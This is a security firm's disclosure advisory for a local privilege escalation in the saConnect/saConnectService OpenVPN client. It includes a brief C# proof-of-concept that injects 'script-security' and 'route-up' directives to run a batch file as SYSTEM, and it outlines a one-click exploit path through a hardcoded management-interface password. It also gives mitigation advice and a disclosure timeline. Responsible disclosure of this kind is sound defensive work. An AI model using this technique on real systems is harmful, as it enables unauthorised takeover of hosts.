Blog & News

July 1, 2024

Advisory: Local privilege escalation in saConnect/saConnectService by Secadm GmbH - now enthus

Release of SCHUTZWERK-SA-2023-002

preview-image for SCHUTZWERK-SA-2023-002
Hash: SHA512


SCHUTZWERK-SA-2023-002: Local privilege escalation in saConnect/saConnectService by Secadm GmbH - now enthus





CVE reference

Not applicable since affected software is not publicly available.



Text-only version:

Affected products/vendor

Custom OpenVPN client, saConnect/saConnectService by Secadm GmbH - now enthus


A local privilege escalation in the saConnectService, an OpenVPN-based VPN client, from Secadm GmbH was discovered.
OpenVPN configuration parameters can be set by a low privileged user via a .NET Remoting IPC[0] call served by the saConnectService.
This allows to execute arbitrary commands with the privilege level of the saConnectService through the route-up script of the OpenVPN connection.


An attacker that has access to an account which is fully configured to use the VPN connection through the saConnect application is able to exploit this vulnerability.
It allows an attacker to escalate the privileges to the privilege level of the saConnectService.

Depending on how the saConnectService is configured this may lead to the highest privilege level on the local system (NT Authority\System).  In the scenario where this vulnerability was discovered, it was possible to fully compromise the host system.

An attacker with basic knowledge in C# and understanding of OpenVPN configurations may find this vulnerability with medium to high effort. To find the vulnerabilities, an attacker might need to reverse engineer the C# executables of saConnect and saConnectService using tools like dnSpy[1] or JetBrains dotPeek[2].

To be able to exploit the vulnerability, an attacker needs to understand how the OpenVPN configuration files, namely endpoints.conf and ProxyVPN.conf, are used.  In the standard configuration, neither the file endpoints.conf nor the main OpenVPN configuration file (ProxyVPN.conf) is visible/accessible to a low privileged user.


A company notebook device assessed by SCHUTZWERK for security vulnerabilities was found to contain a local privilege escalation vulnerability in the custom VPN client.
The VPN client, which is part of Secadm GmbH consulting portfolio (Home-Office und Remote Arbeitsplätze)[3], is a convenience software based on OpenVPN which, among other things, automatically detects and connects to the best VPN endpoint based on quality measurements.
The software uses an OpenVPN deamon embedded within saConnectService to establish the connection which is installed as a Windows service.

Through reverse engineering of the .NET based applications saConnect and saConnectService, SCHUTZWERK discovered the .NET Remoting IPC[0] interface which is used to communicate between these two applications.

Understanding the IPC communication

It showed that saConnect calls the remote functions SetOpenVPNEndpoints and StartOpenVPNServer on the saConnectService via a .NET remoting IPC channel, to configure and start the OpenVPN connection.
Thereby, SetOpenVPNEndpoints writes a configuration string in a file endpoints.conf which is only accessible by higher privileged users.
As seen below, the "endpoints.conf" is used as an additional configuration file ('--config' flag of the OpenVPN command line[4]) in the main OpenVPN configuration file, used by the OpenVPN deamon.

ProxyVPN.conf (main OpenVPN configuration file):
# remote VPN Server IP / Data
config endpoints.conf

The intended use of SetOpenVPNEndpoints is to set the best OpenVPN endpoint as a connection target which was evaluated via connection quality measurements within saConnect.

SCHUTZWERK discovered that the configuration string which is sent to SetOpenVPNEndpoints as a parameter is written into the file endpoints.conf without modification or filtering. This allows to set arbitrary configuration parameters that are applied to the main OpenVPN configuration file.

Manipulating the OpenVPN configuration

By adding two configuration lines (script-security, route-up)[4] that allow calling user-defined scripts it is possible to configure a batch script that executes after successful authentication during the VPN connection.
Through that, code execution in the context of saConnectService can be achieved, if the OpenVPN connection successfully connects to the remote endpoint using the manipulated endpoints.conf.

POC implementation that writes to the endpoints.conf file:
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.AppendLine("remote <redacted-ip> 445 udp");
stringBuilder.AppendLine("cryptoapicert 'THUMB:<Thumbprint of the certificate in the Windows Certificate System Store>'");

// configuration lines that enable code execution
stringBuilder.AppendLine("script-security 2");
stringBuilder.AppendLine("route-up 'C:\\\\tmp\\\\exec.bat'");


The saConnect application overrides the endpoints.conf file on each connection. To execute the code, a POC application must be developed that performs the steps required to successfully launch the VPN connection.

Path to a one-click PoC exploit

In order to establish a connection, the POC application first needs to call the StartOpenVPNServer function on saConnectService to start the embedded OpenVPN deamon. Additionally, because the main OpenVPN configuration configured the management-hold[4] flag, which starts OpenVPN in a hibernating state, the PoC needs to call 'hold release' on the OpenVPN management interface[5].
This tells the OpenVPN deamon to start the connection.

As configured in ProxyVPN.conf, the OpenVPN management interface is configured to listen on localhost port 19334 which requires a password to communicate with.

ProxyVPN.conf (main OpenVPN configuration file):
# Start OpenVPN in a hibernating state, until a client
# of the management interface explicitly starts it.

# Enable a TCP server on ip:port to handle
# management functions.  pass is a password file
# or 'stdin' to prompt from console.
;management ip port [pass]
management 19334 sa/mgmt-pass.txt

The password used to authenticate against the OpenVPN management interface was found to be statically compiled into the saConnect binary. This allows to authenticate to the management interface and issue the required 'hold release' command.

With the ability to write arbitrary configuration flags into the endpoints.conf file and to control the OpenVPN management interface, a one-click C# PoC can be created to exploit this vulnerability.


The vulnerability can be mitigated by introducting a whitelist that limits the configuration parameters passed to the SetOpenVPNEndpoints call in the IPC interface to the ones that are actually needed. This will exclude the configuration parameters (route-up, route-down up, down, script-security...)[4] that can be used to execute scripts in the context of the saConnectService.

Since Secadm GmbH (now enthus) did not provide a version number of the fixed version, please contact entus [6] if you are unsure that you are using the version containing the fix.

Disclosure timeline

2023-05-24: Vulnerability discovered
2023-05-30: Request to the customer to find a contact person at the manufacturer
2023-06-11: Initial contact with manufacturer via customer contact person
2023-06-15: Reply from the manufacturer with a request for more information
2023-06-16: Provision of technical information to trace the security vulnerability
2023-06-26: Inquire with the manufacturer about the current status and plan for patch release
2023-06-28: Bug has been fixed and new version created. Preparation for rollout plan underway
2023-09-14: Contact the manufacturer to find out the status of the customer's patch rollout
2023-09-23: Reply from the customer that rollout completion is planned by the end of September 2023
2023-11-29: Customer informed that rollout of the patch is completed
2024-07-01: Advisory released


The vulnerability was discovered during an assessment by Marvin Louis and Moritz Öhrlein of SCHUTZWERK GmbH.

[0] https://learn.microsoft.com/de-de/dotnet/api/system.runtime.remoting.channels.ipc?view=netframework-4.8.1
[1] https://github.com/dnSpy/dnSpy
[2] https://www.jetbrains.com/de-de/decompiler/
[3] https://secadm.de/consulting.html
[4] https://openvpn.net/community-resources/reference-manual-for-openvpn-2-4/
[5] https://openvpn.net/community-resources/management-interface/
[6] https://enthus.de/


The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The most recent version of this security advisory can be found at SCHUTZWERK GmbH's website ( https://www.schutzwerk.com ).

Additional information

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/


~ Marvin Louis, Moritz Öhrlein

Free Consultation